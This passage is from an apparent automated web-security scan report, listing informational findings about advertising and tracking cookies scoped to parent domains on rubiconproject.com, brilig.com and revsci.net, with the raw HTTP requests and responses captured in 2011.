rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:58 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:06:58 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:06:58 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64381; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^2^1304949680^1304950018&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:06:58 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2210

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...

9.62. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26630-15.js?cb=0.2465566643513739 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:24 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=154dab7990adc1d6f3372c12^9^1304949684^2915161843; expires=Sun, 07-Aug-2011 14:01:24 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:24 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:01:24 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64715; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3200915.js^1^1304949684^1304949684; expires=Mon, 16-May-2011 14:01:24 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2029

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200915"
...[SNIP]...

9.63. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26630-2.js?cb=0.004363113781437278 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk=7856/12590; rdk2=0; ses2=12590^1; csi2=3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:12 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:03:12 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:03:12 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64607; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3200913.js^1^1304949792^1304949792&3196046.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:03:12 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2027

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200913"
...[SNIP]...

9.64. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26633-9.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26633-9.js?cb=0.8043483311776072 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=7858/13549; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:30 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:30 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 09-May-2011 15:01:30 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64709; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi9=3151664.js^1^1304949690^1304949690; expires=Mon, 16-May-2011 14:01:30 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2402

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151664"
...[SNIP]...

9.65. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8201/13264/25249-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8201/13264/25249-15.js?cb=0.48162996326573193 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8201/13264; expires=Mon, 09-May-2011 15:03:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:03:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64618; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3200915.js^1^1304949781^1304949781&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:03:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2198

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200915"
...[SNIP]...

9.66. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/plain
Date: Mon, 09 May 2011 13:59:26 GMT
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Domain=.brilig.com; Expires=Wed, 01-May-2041 13:59:26 GMT
X-Brilig-D: D=9657
Content-Length: 0
Connection: keep-alive
9.67. http://pix04.revsci.net/B08725/b3/0/3/1008211/17329585.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /B08725/b3/0/3/1008211/17329585.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /B08725/b3/0/3/1008211/17329585.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.orlandosentinel.com%252Fbusiness%252Fos-cfb-cover-casey-tv-20110509%252C0%252C6839926.story%253FSite%253Dorlandosentinel.com%2526channel%253DOrlando%252520Sentinel%25253Abusiness%2526keyword%253D%2526_rsiL%253D0%26DM_CAT%3DOrlando%2520Sentinel%253Abusiness%26DM_EOM%3D1&C=B08725 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_t9sN=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; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsiPus_oJ6I="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_t9sN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoy+orHpQk6PK6+svaFag8xPIug3kXteXuVX2UEJaBODIxOl+Ft328ehTKAqGkfpU+SdWY5lRxpDwKjYa958M7DcCelfS1RBfPRqtbqpB56CpIqfy8vz/43Wm1wI5tPyY6T7TDGk8a5yJjVF7BgBg2gp94t77lvFYAp63GPCqzUCUz4o8F2YAwwDQna6pVUUkDxayBLH6sVK6odcuFf/h6IqI+T1O4+4CkO2a0mUowSwIf12wRxvpzxTQhOmTfqLI4XiOI0TpY=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 13:59:49 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
Set-Cookie: rtc_bhnH=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
X-Proc-ms: 37
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Length: 849

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['B08725_10011','D08734_70008','D08734_72078','B08725_50060','B08725_50578','B08725_50657'];
var rsiExp=new Date((new Date()).getTime()+2
...[SNIP]...

9.68. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=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; udm_0=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; rsiPus_xqR7="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"; rsi_us_1000000="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"; 
rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ8U7xE84mx8cR/xmi3McKUrpVsIwOgHBRuY4DkmM2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oL6zR/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkcZJg/g==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
